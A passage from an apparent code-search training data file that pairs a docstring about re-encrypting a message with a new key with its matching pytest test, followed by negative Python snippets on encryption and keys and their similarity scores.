run through LFSR once\n u = self.__LFSR(key)\n # encrypt\n enc[idx] = enc[idx] ^ u\n return enc", "def xorstr (key, msg):\n # join a list of chars into string where list is generated by \n # XORing each of msg bytes with each of the key bytes rotating.\n return ''.join([chr(ord(msg[i]) ^ ord(key[i % len(key)])) for i in range (0, len(msg))])", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def repeating_key_xor(plaintext, key):\n ciphertext = ''\n i = 0\n\n for byte in plaintext:\n ciphertext += chr(byte ^ key[i])\n\n i = (i + 1) % len(key)\n return ciphertext", "def discard(self, key: KT) -> None:\n discard(self, key)", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def _key_generated(self, key, index):\n self.keys[self.get_address(key)] = key\n self.last_generated_index = index", "def _newKey(self, key):\n self._testKeySubNsAdd()\n self._getKeyList().append(key)", "def MakeKey(self, string, string_1, string_2):\n ...", "def test_envelope_routed(self):\n addr_1 = self.connection_client_1.address\n addr_2 = self.connection_client_2.address\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=20)\n\n assert delivered_envelope is not None\n assert delivered_envelope.to == envelope.to\n assert delivered_envelope.sender == envelope.sender\n assert (\n delivered_envelope.protocol_specification_id\n == envelope.protocol_specification_id\n )\n assert delivered_envelope.message == envelope.message", "def test_envelope_routed(self):\n addr_1 = self.connection_client_1.address\n addr_2 = self.connection_client_2.address\n\n msg = 
DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=20)\n\n assert delivered_envelope is not None\n assert delivered_envelope.to == envelope.to\n assert delivered_envelope.sender == envelope.sender\n assert (\n delivered_envelope.protocol_specification_id\n == envelope.protocol_specification_id\n )\n assert delivered_envelope.message == envelope.message", "def eliminate_key (self,key):\r\n\r\n if self.using_shelf:\r\n\r\n del self.key_dict[str(key)]", "def generate_key():\n key = list(Fleissner.default)\n random.shuffle(key)\n done = False\n while not done:\n try:\n Fleissner(key=\"\".join(key))\n done = True\n except:\n random.shuffle(key)\n return \"\".join(key)", "def test_data_missing_key_builder(self):\n graph = BELGraph()\n p1 = protein(\"HGNC\", n())\n p2 = protein(\"HGNC\", n())\n graph.add_node_from_data(p1)\n graph.add_node_from_data(p2)\n\n key, other_key = \"k1\", \"k2\"\n\n data_missing_key = data_missing_key_builder(key)\n\n graph.nodes[p1][key] = n()\n graph.nodes[p2][other_key] = n()\n\n nodes = set(filter_nodes(graph, data_missing_key))\n\n self.assertNotIn(p1, nodes)\n self.assertIn(p2, nodes)", "def encrypt_message(K, message):\n\n plaintext = message.encode(\"utf8\")\n \n aes = Cipher(\"aes-128-gcm\")\n iv = urandom(16)\n # Encryption using AES-GCM returns a ciphertext and a tag\n ciphertext, tag = aes.quick_gcm_enc(K, iv, plaintext) \n \n\n return (iv, ciphertext, tag)", "def private_key(self):", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def test_multiple_messages_received_at_once(self):\n # Send 2 messages\n self.sock.send(message + message)\n # Receive them back\n ident, payload = self.inverter.receive()\n self.assertEqual(b\"\\x00\\x01\\x02\", ident)\n self.assertEqual(b\"\", payload)\n ident, payload = self.inverter.receive()\n self.assertEqual(b\"\\x00\\x01\\x02\", ident)\n self.assertEqual(b\"\", payload)", "def make_hmac(message, key):\n h = HMAC.new(key)\n h.update(message)\n return h.hexdigest()", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def exchange_key(connection, pub_key):\r\n\r\n if main.diffe_key_exchange is False:\r\n # Get the server's public key\r\n server_pub_key_bytes = connection.recv(1024)\r\n\r\n # Send public key\r\n connection.sendall(rsa.PublicKey.save_pkcs1(pub_key))\r\n\r\n else:\r\n # Rounds of bit-shifting and XOR\r\n rounds = 64\r\n\r\n while True:\r\n\r\n # Generate 4096-bit keys (RFC 3526 Group 16)\r\n client_diffe_key = pyDHE.new(16)\r\n shared_secret = client_diffe_key.negotiate(connection)\r\n\r\n # Encrypt\r\n encrypted = int(binascii.hexlify(rsa.PublicKey.save_pkcs1(pub_key)).decode(), 16)\r\n for x in range(0, rounds):\r\n encrypted = encrypted ^ (shared_secret ** rounds)\r\n encrypted = encrypted << rounds\r\n encrypted = int(str(encrypted)[::-1])\r\n\r\n # Decrypt\r\n decrypted = encrypted\r\n decrypted = int(str(decrypted)[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n # Check if able to decrypt\r\n try:\r\n 
binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n client_success = True\r\n\r\n # Generate new keys upon failure and try again\r\n except UnicodeDecodeError:\r\n client_success = False\r\n pass\r\n except binascii.Error:\r\n client_success = False\r\n pass\r\n\r\n # Notify client about encryption status\r\n server_success = connection.recv(1024)\r\n if client_success is False:\r\n connection.send(b'DHE')\r\n else:\r\n connection.send(b'CONTINUE')\r\n\r\n # Get encryption status from client\r\n if client_success is False or server_success == b'DHE':\r\n pass\r\n elif server_success == b'CONTINUE':\r\n break\r\n\r\n # Hold encrypted server key\r\n server_encrypted = b''\r\n\r\n # Receive encrypted key from the server\r\n while True:\r\n data = connection.recv(8192)\r\n if data == b'ENDED':\r\n break\r\n elif data[-5:] == b'ENDED':\r\n server_encrypted += data[:-5]\r\n break\r\n server_encrypted += data\r\n\r\n # Send the encrypted key to the server\r\n connection.sendall(bytes(hex(encrypted).encode()))\r\n connection.send(b'ENDED')\r\n\r\n # Decrypt the client's public key\r\n decrypted = int(server_encrypted, 16)\r\n decrypted = int(str(int(decrypted))[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n server_pub_key_bytes = binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n\r\n server_pub_key = rsa.PublicKey.load_pkcs1(server_pub_key_bytes)\r\n # Determine max message size\r\n max_message_size = common.byte_size(server_pub_key.n) - 11\r\n\r\n # Return crypto key information\r\n return server_pub_key, server_pub_key_bytes, max_message_size", "def message(self, key):\n msg = '[ensime] ' + feedback[key]\n self.raw_message(msg)", "def shouldPrintMessage(self, timestamp: int, message: str) -> bool:\n if message not in self.hashmap:\n self.hashmap[message] = timestamp\n return True\n elif timestamp - self.hashmap[message] >= 10:\n self.hashmap[message] = timestamp\n return True\n return False", "def key( self, mess, args):\n user = mess.getFrom()\n if user in self.users:\n return 'You are already subscribed.'\n else:\n self.users[user] = args\n self.log( '%s subscribed to the broadcast.' % user)\n return 'You are now subscribed.'", "def GenerateKey(self):\n self.key_name = self.key_name or str(uuid.uuid4())\n if self.key is None or not self.key.id():\n self.key = ndb.Key(self._get_kind(), self.key_name)\n return True\n return False", "def encrypt_message(message: str, key: int = 17):\n\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n shifted_alphabet = alphabet[key:] + alphabet[:key]\n encrypted_message = \"\"\n\n for i in message.upper():\n\n # Use encryption for letters only, keep the rest\n if i in alphabet:\n\n # Find index in alphabet\n for idx, l in enumerate(alphabet):\n if i == l:\n\n # Add letter in shifted alphabet\n # with this index to the message\n encrypted_message += shifted_alphabet[idx]\n else:\n encrypted_message += i\n\n return encrypted_message" ]
[ "0.6353171", "0.6112065", "0.6050746", "0.60195196", "0.60014725", "0.5931781", "0.59107494", "0.58862585", "0.58743024", "0.5822409", "0.5816319", "0.5803703", "0.5773151", "0.57707894", "0.5769746", "0.57522786", "0.5739855", "0.56940407", "0.5691956", "0.5683916", "0.5650976", "0.5640389", "0.5614024", "0.5602148", "0.55912846", "0.5574919", "0.55580616", "0.55496866", "0.5525936", "0.55230445", "0.5513836", "0.5505172", "0.55045414", "0.5489394", "0.5483186", "0.54536504", "0.5396713", "0.5381907", "0.53645647", "0.53645647", "0.5329567", "0.5302337", "0.53008956", "0.5295404", "0.5285801", "0.5283134", "0.5280055", "0.5262407", "0.5262407", "0.52621925", "0.52621925", "0.52533925", "0.52479744", "0.52373976", "0.52370113", "0.5236767", "0.5235933", "0.52343446", "0.5220521", "0.5216978", "0.5215469", "0.52055377", "0.5195433", "0.51794", "0.5176292", "0.51760805", "0.51760805", "0.5174731", "0.51656085", "0.51408476", "0.5139458", "0.51391447", "0.51337326", "0.51320624", "0.51094365", "0.51083463", "0.51068926", "0.5098633", "0.5093519", "0.50934523", "0.5092304", "0.5089464", "0.5087012", "0.50843865", "0.50843865", "0.508311", "0.50807506", "0.5074735", "0.50747067", "0.5064746", "0.50545263", "0.5051179", "0.5051056", "0.5051052", "0.50476384", "0.50456655", "0.50389475", "0.503734", "0.5031326", "0.5025984" ]
0.55720454
26
It reencrypts an encrypted message using a new key.
def test_rekey(self):
    old_key = b'0' * 32
    new_key = b'1' * 32

    old_encrypted = encrypt('message', key=old_key)
    new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)

    assert decrypt(new_encrypted, key=new_key) == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def encrypt(self, message, key):\n return self.translateMessage(message, key, \"encrypt\")", "def encrypt(key, plaintext):\n data = fk(keyGen(key)[0], ip(plaintext))\n return fp(fk(keyGen(key)[1], swapNibbles(data)))", "def encrypt(key, plaintext, cipher):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n p = plaintext.read()\n c = rsa.encrypt(p, k)\n\n cipher.write(c)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except OverflowError:\n click.echo(\"ERROR: Message is to long for encryption with the given key.\")", "def fernet_encript(key,message):\n\tf = Fernet(key)\n\treturn f.encrypt(message)", "def update(self, plaintext):\n return self._encryptor.update(plaintext)", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def encrypt(self, message, key):\n message = self.pkcs7_pad(message)\n iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(AES.block_size))\n cipher = AES.new(key, AES.MODE_CBC, iv, segment_size=64)\n return iv + cipher.encrypt(message)", "def encrypt_message(message: str, key: int = 17):\n\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n shifted_alphabet = alphabet[key:] + alphabet[:key]\n encrypted_message = \"\"\n\n for i in message.upper():\n\n # Use encryption for letters only, keep the rest\n if i in alphabet:\n\n # Find index in alphabet\n for idx, l in enumerate(alphabet):\n if i == l:\n\n # Add letter in shifted alphabet\n # with this index to the message\n encrypted_message += shifted_alphabet[idx]\n else:\n encrypted_message += i\n\n return encrypted_message", "def encryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n encoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code+key\n new = chr(change)\n string += new\n key += key_increment\n \n encoded = ''.join(string)\n return ('Encoded Message:\\t' + encoded)", "def rsa_encrypt(message, publickey):\r\n \r\n # A key object is created to interact with the PyCrypto\r\n # encryption suite. 
The object contains key data and\r\n # the necessary rsa functions.\r\n temp_key_obj = _rsa_keydict_to_keyobj(publickey)\r\n \r\n return _rsa_chopstring(message, temp_key_obj, temp_key_obj.encrypt)", "def repeating_key_xor(plaintext, key):\n ciphertext = ''\n i = 0\n\n for byte in plaintext:\n ciphertext += chr(byte ^ key[i])\n\n i = (i + 1) % len(key)\n return ciphertext", "def caesarShiftStringOps(message, key, encrypt=True):\n message = message.lower().replace(' ', '')\n alphabet = string.ascii_lowercase\n\n if not encrypt:\n key = -key\n\n shiftedAlphabet = alphabet[key:] + alphabet[:key]\n return message.translate(str.maketrans(alphabet, shiftedAlphabet))", "def func(plaintext, key):\n ciphertext = xor(plaintext, key)\n return ciphertext", "def decrypt_message(encrypted_message):", "def encrypt(message, key):\n\tnumericRepresentation = []\n\tfor c in message:\n\t\tnumericRepresentation.append(ord(c) - 65)\n\n\tcipher = \"\"\n\tfor x in numericRepresentation:\n\t\tcipher += chr((x + key) % 26 + 65)\n\n\treturn cipher", "def caesarShift(message, key, encrypt=True):\n message = message.lower().replace(' ', '')\n alphabet = string.ascii_lowercase\n newMessage = \"\"\n\n # Change shift direction depending on encrypting or decrypting\n if not encrypt:\n key = -key\n\n # Loop through the message\n for char in message:\n index = alphabet.find(char)\n newMessage += alphabet[(index + key) % 26]\n\n return newMessage", "def aes_encrypt(data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = pad(data)\r\n return cipher.encrypt(padded_data)", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def exchange_key(connection, pub_key):\r\n\r\n if main.diffe_key_exchange is False:\r\n # Get the server's public key\r\n server_pub_key_bytes = connection.recv(1024)\r\n\r\n # Send public key\r\n connection.sendall(rsa.PublicKey.save_pkcs1(pub_key))\r\n\r\n else:\r\n # Rounds of bit-shifting and XOR\r\n rounds = 64\r\n\r\n while True:\r\n\r\n # Generate 4096-bit keys (RFC 3526 Group 16)\r\n client_diffe_key = pyDHE.new(16)\r\n shared_secret = client_diffe_key.negotiate(connection)\r\n\r\n # Encrypt\r\n encrypted = int(binascii.hexlify(rsa.PublicKey.save_pkcs1(pub_key)).decode(), 16)\r\n for x in range(0, rounds):\r\n encrypted = encrypted ^ (shared_secret ** rounds)\r\n encrypted = encrypted << rounds\r\n encrypted = int(str(encrypted)[::-1])\r\n\r\n # Decrypt\r\n decrypted = encrypted\r\n decrypted = int(str(decrypted)[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n # Check if able to decrypt\r\n try:\r\n binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n client_success = True\r\n\r\n # Generate new keys upon failure and try again\r\n except UnicodeDecodeError:\r\n client_success = False\r\n pass\r\n except binascii.Error:\r\n client_success = False\r\n pass\r\n\r\n # Notify client about encryption status\r\n server_success = connection.recv(1024)\r\n if client_success is False:\r\n connection.send(b'DHE')\r\n else:\r\n connection.send(b'CONTINUE')\r\n\r\n # Get encryption status from client\r\n if client_success is False or server_success == b'DHE':\r\n pass\r\n elif server_success == 
b'CONTINUE':\r\n break\r\n\r\n # Hold encrypted server key\r\n server_encrypted = b''\r\n\r\n # Receive encrypted key from the server\r\n while True:\r\n data = connection.recv(8192)\r\n if data == b'ENDED':\r\n break\r\n elif data[-5:] == b'ENDED':\r\n server_encrypted += data[:-5]\r\n break\r\n server_encrypted += data\r\n\r\n # Send the encrypted key to the server\r\n connection.sendall(bytes(hex(encrypted).encode()))\r\n connection.send(b'ENDED')\r\n\r\n # Decrypt the client's public key\r\n decrypted = int(server_encrypted, 16)\r\n decrypted = int(str(int(decrypted))[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n server_pub_key_bytes = binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n\r\n server_pub_key = rsa.PublicKey.load_pkcs1(server_pub_key_bytes)\r\n # Determine max message size\r\n max_message_size = common.byte_size(server_pub_key.n) - 11\r\n\r\n # Return crypto key information\r\n return server_pub_key, server_pub_key_bytes, max_message_size", "def encryptCaesar(message, key):\r\n newMessage = \"\"\r\n for char in message:\r\n if char in alphaLower:\r\n newLetterPosition = (alphaLower.index(char) + key) % 26\r\n newMessage += alphaLower[newLetterPosition]\r\n elif char in alphaUpper:\r\n newLetterPosition = (alphaUpper.index(char) + key) % 26\r\n newMessage += alphaUpper[newLetterPosition]\r\n else: newMessage += char\r\n return newMessage", "def encrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n ciphertext = aes.encrypt(text)\r\n return ciphertext", "def encrypt(message, key):\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n new_st = ''\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0 and alpha_lower.index(x) + key < 26:\r\n new_st += alpha_lower[alpha_lower.index(x) + key]\r\n\r\n if alpha_upper.count(x) != 0 and alpha_upper.index(x) + key < 26:\r\n new_st += alpha_upper[alpha_upper.index(x) + key]\r\n\r\n if alpha_upper.count(x)!= 0 and alpha_upper.index(x) + key >= 26:\r\n new_st += alpha_upper[alpha_upper.index(x) + key - 26]\r\n\r\n if alpha_lower.count(x) != 0 and alpha_lower.index(x) + key >= 26:\r\n new_st += alpha_lower[alpha_lower.index(x) + key - 26]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n # --- CODE ENDS HERE\r", "def encrypt(self, message, key=None):\n if key is None:\n key = self.public_key\n encrypter = RSA.importKey(key)\n return encrypter.encrypt(message, 2048)", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def encrypt(message, pub_key):\n\n if not isinstance(pub_key, key.PublicKey):\n raise TypeError(\"You must use the public key with encrypt\")\n\n return chopstring(message, pub_key.e, pub_key.n, encrypt_int)", "def encrypt(cls, plaintext, aad, key, iv):", "def encrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.encrypt(message.encode())", "def update_key(self):\n self.__prev_key = self.__new_key", "def encrypt(self, message):\n E = (((k + int_mapping(c)) % 26) for k, c in 
zip(cycle(self.key), preprocess(message)))\n return ''.join(char_mapping(n) for n in E)", "def encrypt(plaintext: str, key: str) -> str:\n return \"\".join(chr(ord(p) ^ ord(k)) for (p, k) in zip(plaintext, key))", "def run():\n key = input(\"Enter a 26 letter key: \")\n if not isValidKey(key):\n print(\"Invalid key.\")\n return\n plainText = input(\"Plain Text: \")\n cipherText = substitution(plainText, key)\n print(f\"Cipher Text: {cipherText}\")\n return", "def decrypt(message, key):\r\n\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n new_st = ''\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0:\r\n new_st += alpha_lower[alpha_lower.index(x) - key]\r\n if alpha_upper.count(x) != 0:\r\n new_st += alpha_upper[alpha_upper.index(x) - key]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n\r\n # --- CODE ENDS HERE\r", "def encrypt(plaintext, key, verbose=False):\n Nb = 4\n Nk = int((len(key) * 4) / 32)\n Nr = Nk + 6\n w = key_expansion(text_to_bytes(key), Nb, Nr, Nk)\n state = text_to_matrix(plaintext)\n\n print_round(0, 'input', matrix_to_text(state), verbose)\n add_round_key(state, w, 0, Nb)\n print_round(0, 'k_sch', get_round_key(w, 0, Nb), verbose)\n\n for round in range(1, Nr + 1):\n print_round(round, 'start', matrix_to_text(state), verbose)\n\n sub_bytes(state)\n print_round(round, 's_box', matrix_to_text(state), verbose)\n\n shift_rows(state)\n print_round(round, 's_row', matrix_to_text(state), verbose)\n\n if round != Nr:\n mix_columns(state)\n print_round(round, 'm_col', matrix_to_text(state), verbose)\n\n add_round_key(state, w, round, Nb)\n print_round(round, 'k_sch', get_round_key(w, round, Nb), verbose)\n\n print_round(round, 'output', matrix_to_text(state), verbose)\n\n return matrix_to_text(state)", "def encrypt_message(self):\r\n\t\t#Will not let user input useless messages that cannot be encrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to encrypt. 
--> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\tself.setup_key_encrypt()\r\n\t\tmy_code = Encryptor(self.message, self.key)\r\n\t\tprint(my_code.transfer_encrypt()+ \"|\")", "def __encryptRSA(msg, key):\n # Convert message to bytes\n msg = msg.encode('utf-8')\n return key.encrypt(\n msg,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )", "def apply_old_re_enc(data=None, re_enc_info=None, debug=0):\n\n # Check if data is set\n if data is None:\n logging.error('apply_old_re_enc data exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in remove_re_enc data')\n raise Exception\n\n # Check if re_enc_info is set\n if re_enc_info is None:\n logging.error('apply_old_re_enc re_enc_info exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in apply_old_re_enc re_enc_info')\n raise Exception\n\n # Extract re-encryption parameters\n seed, key, iv, re_enc_length, init_val = get_re_enc_params(re_enc_info, debug)\n\n # Apply re-encryption\n return re_enc.re_encrypt(data, re_enc_length, seed, key, iv, init_val, 0)", "def encrypt(self, plaintext):\n\n # See comment in decrypt\n #\n if self.prev_crypto_op and self.prev_crypto_op != self.encrypt:\n raise RuntimeError('Same instance used for encrypt/decrypt')\n self.prev_crypto_op = self.encrypt\n\n return self.rc4.update(plaintext)", "def encrypt_key(data, key):\n data = MegaCrypto.base64_decode(data)\n return sum((MegaCrypto.str_to_a32(MegaCrypto.cbc_encrypt(data[_i:_i + 16], key))\n for _i in range(0, len(data), 16)), ())", "def encrypt_block(self, plaintext):\n assert len(plaintext) == 16\n plain_state = bytes2matrix(plaintext)\n\n add_round_key(plain_state, self._key_matrices[0])\n\n for i in range(1, self.n_rounds):\n sub_bytes(plain_state)\n shift_rows(plain_state)\n mix_columns(plain_state)\n add_round_key(plain_state, self._key_matrices[i])\n\n sub_bytes(plain_state)\n shift_rows(plain_state)\n add_round_key(plain_state, self._key_matrices[-1])\n\n return matrix2bytes(plain_state)", "def _encrypt_aes_key(aes_key: bytes, receiver_public_key: RsaKey) -> bytes:\n cipher_rsa = PKCS1_OAEP.new(receiver_public_key)\n return cipher_rsa.encrypt(aes_key)", "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def decipher(s, key): # s = message\n return decipher_raw(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def update(self, ciphertext):\n return self._decryptor.update(ciphertext)", "def _seal_message(self, message):\n encrypted_message = self.outgoing_handle.update(message)\n return encrypted_message", "def xorstr (key, msg):\n # join a list of chars into string where list is generated by \n # XORing each of msg bytes with each of the key bytes rotating.\n return ''.join([chr(ord(msg[i]) ^ ord(key[i % len(key)])) for i in range (0, len(msg))])", "def decryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n decoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code-key\n new = chr(change)\n string += new\n key += key_increment\n decoded = ''.join(string)\n return ('Decoded Message:\\t' + decoded)", "def _set_key(self, key):\n\n # select 56 bits from the 64-bit key\n key = self._permutate(self.__pc1, self._string_to_bitlist(key))\n self.L = key[:28]\n self.R = key[28:]\n for i in range(0, 16):\n for j in range(0, self.__left_rotations[i]):\n self.L.append(self.L[0])\n del self.L[0]\n self.R.append(self.R[0])\n del 
self.R[0]\n # select 48 bits from 56 bits\n self.Kn[i] = self._permutate(self.__pc2, self.L + self.R)", "def encrypt(text, key):\r\n\trail = [['\\n' for i in range(len(text))] for j in range(key)] \r\n\t\r\n\tdir_down = False\r\n\trow, col = 0, 0\r\n\t\r\n\tfor i in range(len(text)): \r\n\t\tif (row == 0) or (row == key - 1): \r\n\t\t\tdir_down = not dir_down \r\n\t\t\r\n\t\trail[row][col] = text[i] \r\n\t\tcol += 1\r\n\t\t\r\n\t\tif dir_down: \r\n\t\t\trow += 1\r\n\t\telse: \r\n\t\t\trow -= 1\r\n\t \r\n\tresult = [] \r\n\tfor i in range(key): \r\n\t\tfor j in range(len(text)): \r\n\t\t\tif rail[i][j] != '\\n': \r\n\t\t\t\tresult.append(rail[i][j]) \r\n\treturn(\"\" . join(result))", "def encrypt(self, input, key, iv):\n pass", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:\n ciphertext = \"\"\n # PUT YOUR CODE HERE\n\n key_lenght = len(keyword)\n text_lenght = len(plaintext)\n while key_lenght != text_lenght:\n keyword += keyword\n key_lenght = len(keyword)\n if key_lenght > text_lenght:\n keyword = keyword[:text_lenght]\n key_lenght = len(keyword)\n code_key = []\n ord_A = ord('A')\n ord_a = ord('a')\n\n if plaintext.islower():\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_a)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_a)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n ciphertext += \" \"\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_a\n ciphertext += chr(value)\n else:\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_A)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_A)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n value = ord(\" \")\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_A\n ciphertext += chr(value)\n return ciphertext", "def md5_encrypt(self, key):\n # instantiate the md5 object in hashlib module\n md5_object = hashlib.md5()\n # encrypt the key\n md5_object.update(key)\n # return the encrypted key\n encrypted_key = md5_object.hexdigest()\n return encrypted_key", "def aes_key_unwrap(self, kek: bytes, wrapped_key: bytes) -> bytes:\n return keywrap.aes_key_unwrap(kek, wrapped_key, default_backend())", "def encrypt(self):\n self.cipherText = self.cipherField.getText()\n # Set up the initial state of the encryption.\n if self.cipherText == \"\":\n self.matrixButton[\"state\"] = \"disabled\"\n self.plainText = self.plainField.getText()\n self.limit = len(self.plainText)\n if self.limit % 2 == 1:\n self.limit -= 1\n self.cursor = 0\n # Use the matrix to encrypt one pair of characters.\n if self.cursor < self.limit:\n self.cipherText += self.encryptPair()\n self.cipherField.setText(self.cipherText)\n self.cursor += 2\n # Add the last character if plaintext length was odd.\n elif self.limit < len(self.plainText):\n self.cipherText += self.plainText[self.limit]\n self.cipherField.setText(self.cipherText)\n # Clean up when done.\n if len(self.plainText) == len(self.cipherText):\n self.encryptButton[\"text\"] = \"Clear fields\"\n self.encryptButton[\"command\"] = self.clearFields", "def perform_aes_algorithm(plaintext, key):\n if 
